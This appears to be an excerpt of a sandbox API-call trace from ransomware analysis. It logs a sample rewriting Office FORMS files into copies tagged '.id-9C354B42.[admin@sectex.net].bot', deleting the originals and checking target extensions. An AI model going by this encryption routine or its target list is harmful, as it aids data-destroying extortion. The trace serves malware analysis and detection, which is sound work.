	[0161.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.690] GetLastError () returned 0x0
	[0161.690] ReadFile (in: hFile=0x37c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0161.705] WriteFile (in: hFile=0x1b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0161.706] ReadFile (in: hFile=0x37c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.706] WriteFile (in: hFile=0x1b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0161.706] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.706] CloseHandle (hObject=0x1b4) returned 1
	[0161.706] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.706] SetEndOfFile (hFile=0x37c) returned 1
	[0161.708] CloseHandle (hObject=0x37c) returned 1
	[0161.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.709] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico")) returned 1
	[0161.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.710] lstrlenW (lpString=".doc") returned 4
	[0161.710] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.710] lstrlenW (lpString=".docx") returned 5
	[0161.710] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.710] lstrlenW (lpString=".pdf") returned 4
	[0161.710] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.710] lstrlenW (lpString=".xls") returned 4
	[0161.710] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.710] lstrlenW (lpString=".xlsx") returned 5
	[0161.710] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.710] lstrlenW (lpString=".ppt") returned 4
	[0161.710] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.711] lstrlenW (lpString=".zip") returned 4
	[0161.711] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.711] lstrlenW (lpString=".rar") returned 4
	[0161.711] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.711] lstrlenW (lpString=".bz2") returned 4
	[0161.711] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.711] lstrlenW (lpString=".7z") returned 3
	[0161.711] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.711] lstrlenW (lpString=".dbf") returned 4
	[0161.711] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.711] lstrlenW (lpString=".1cd") returned 4
	[0161.711] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.711] lstrlenW (lpString=".jpg") returned 4
	[0161.711] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.711] lstrlenW (lpString=".doc") returned 4
	[0161.711] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.711] lstrlenW (lpString=".docx") returned 5
	[0161.711] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.711] lstrlenW (lpString=".pdf") returned 4
	[0161.711] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.711] lstrlenW (lpString=".xls") returned 4
	[0161.711] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.711] lstrlenW (lpString=".xlsx") returned 5
	[0161.711] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.711] lstrlenW (lpString=".ppt") returned 4
	[0161.711] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.712] lstrlenW (lpString=".zip") returned 4
	[0161.712] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.712] lstrlenW (lpString=".rar") returned 4
	[0161.712] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.712] lstrlenW (lpString=".bz2") returned 4
	[0161.712] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.712] lstrlenW (lpString=".7z") returned 3
	[0161.712] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.712] lstrlenW (lpString=".dbf") returned 4
	[0161.712] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.712] lstrlenW (lpString=".1cd") returned 4
	[0161.712] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO") returned 63
	[0161.712] lstrlenW (lpString=".jpg") returned 4
	[0161.712] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.712] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.712] lstrlenW (lpString="REC.CFG") returned 7
	[0161.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.714] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1617) returned 1
	[0161.714] CloseHandle (hObject=0x37c) returned 1
	[0161.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg")) returned 0x20
	[0161.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.714] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.714] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.715] GetLastError () returned 0x0
	[0161.715] ReadFile (in: hFile=0x37c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x651, lpOverlapped=0x0) returned 1
	[0161.718] WriteFile (in: hFile=0x1b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x660, lpOverlapped=0x0) returned 1
	[0161.719] ReadFile (in: hFile=0x37c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.719] WriteFile (in: hFile=0x1b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0161.719] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.721] CloseHandle (hObject=0x1b4) returned 1
	[0161.730] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.730] SetEndOfFile (hFile=0x37c) returned 1
	[0161.740] CloseHandle (hObject=0x37c) returned 1
	[0161.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.740] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg")) returned 1
	[0161.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.741] lstrlenW (lpString=".doc") returned 4
	[0161.741] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.741] lstrlenW (lpString=".docx") returned 5
	[0161.741] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0161.741] lstrlenW (lpString=".pdf") returned 4
	[0161.741] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.741] lstrlenW (lpString=".xls") returned 4
	[0161.741] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.741] lstrlenW (lpString=".xlsx") returned 5
	[0161.741] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0161.741] lstrlenW (lpString=".ppt") returned 4
	[0161.741] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.741] lstrlenW (lpString=".zip") returned 4
	[0161.741] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.742] lstrlenW (lpString=".rar") returned 4
	[0161.742] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.742] lstrlenW (lpString=".bz2") returned 4
	[0161.742] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.742] lstrlenW (lpString=".7z") returned 3
	[0161.742] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.742] lstrlenW (lpString=".dbf") returned 4
	[0161.742] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.742] lstrlenW (lpString=".1cd") returned 4
	[0161.742] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.742] lstrlenW (lpString=".jpg") returned 4
	[0161.742] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.742] lstrlenW (lpString=".doc") returned 4
	[0161.742] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.742] lstrlenW (lpString=".docx") returned 5
	[0161.742] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0161.742] lstrlenW (lpString=".pdf") returned 4
	[0161.742] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.742] lstrlenW (lpString=".xls") returned 4
	[0161.742] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.742] lstrlenW (lpString=".xlsx") returned 5
	[0161.742] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0161.742] lstrlenW (lpString=".ppt") returned 4
	[0161.742] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.742] lstrlenW (lpString=".zip") returned 4
	[0161.743] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.743] lstrlenW (lpString=".rar") returned 4
	[0161.743] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.743] lstrlenW (lpString=".bz2") returned 4
	[0161.743] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.743] lstrlenW (lpString=".7z") returned 3
	[0161.743] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.743] lstrlenW (lpString=".dbf") returned 4
	[0161.743] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.743] lstrlenW (lpString=".1cd") returned 4
	[0161.743] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG") returned 61
	[0161.743] lstrlenW (lpString=".jpg") returned 4
	[0161.743] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.743] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.743] lstrlenW (lpString="REMOTE.CFG") returned 10
	[0161.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0162.666] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=779) returned 1
	[0162.666] CloseHandle (hObject=0x1b4) returned 1
	[0162.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg")) returned 0x20
	[0162.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0162.691] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.691] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0162.691] GetLastError () returned 0x0
	[0162.691] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x30b, lpOverlapped=0x0) returned 1
	[0162.693] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x310, lpOverlapped=0x0) returned 1
	[0162.694] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.694] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0162.694] SetEndOfFile (hFile=0x398) returned 1
	[0162.694] CloseHandle (hObject=0x398) returned 1
	[0162.694] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.694] SetEndOfFile (hFile=0x1b4) returned 1
	[0162.698] CloseHandle (hObject=0x1b4) returned 1
	[0162.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.699] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg")) returned 1
	[0162.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.700] lstrlenW (lpString=".doc") returned 4
	[0162.700] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0162.700] lstrlenW (lpString=".docx") returned 5
	[0162.700] lstrcmpiW (lpString1=".docx", lpString2="E.CFG") returned -1
	[0162.700] lstrlenW (lpString=".pdf") returned 4
	[0162.700] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0162.700] lstrlenW (lpString=".xls") returned 4
	[0162.700] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0162.700] lstrlenW (lpString=".xlsx") returned 5
	[0162.700] lstrcmpiW (lpString1=".xlsx", lpString2="E.CFG") returned -1
	[0162.700] lstrlenW (lpString=".ppt") returned 4
	[0162.700] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0162.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.700] lstrlenW (lpString=".zip") returned 4
	[0162.700] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0162.700] lstrlenW (lpString=".rar") returned 4
	[0162.700] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0162.700] lstrlenW (lpString=".bz2") returned 4
	[0162.700] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0162.700] lstrlenW (lpString=".7z") returned 3
	[0162.700] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0162.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.700] lstrlenW (lpString=".dbf") returned 4
	[0162.700] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0162.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.700] lstrlenW (lpString=".1cd") returned 4
	[0162.700] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0162.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.700] lstrlenW (lpString=".jpg") returned 4
	[0162.700] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0162.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.701] lstrlenW (lpString=".doc") returned 4
	[0162.701] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0162.701] lstrlenW (lpString=".docx") returned 5
	[0162.701] lstrcmpiW (lpString1=".docx", lpString2="E.CFG") returned -1
	[0162.701] lstrlenW (lpString=".pdf") returned 4
	[0162.701] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0162.701] lstrlenW (lpString=".xls") returned 4
	[0162.701] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0162.701] lstrlenW (lpString=".xlsx") returned 5
	[0162.701] lstrcmpiW (lpString1=".xlsx", lpString2="E.CFG") returned -1
	[0162.701] lstrlenW (lpString=".ppt") returned 4
	[0162.701] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0162.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.701] lstrlenW (lpString=".zip") returned 4
	[0162.701] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0162.701] lstrlenW (lpString=".rar") returned 4
	[0162.701] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0162.701] lstrlenW (lpString=".bz2") returned 4
	[0162.701] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0162.701] lstrlenW (lpString=".7z") returned 3
	[0162.701] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0162.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.701] lstrlenW (lpString=".dbf") returned 4
	[0162.701] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0162.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.701] lstrlenW (lpString=".1cd") returned 4
	[0162.701] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0162.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG") returned 64
	[0162.701] lstrlenW (lpString=".jpg") returned 4
	[0162.701] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0162.702] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0162.702] lstrlenW (lpString="REPORT.CFG") returned 10
	[0162.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0162.702] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=781) returned 1
	[0162.702] CloseHandle (hObject=0x1b4) returned 1
	[0162.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg")) returned 0x20
	[0162.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0162.703] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.703] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0162.704] GetLastError () returned 0x0
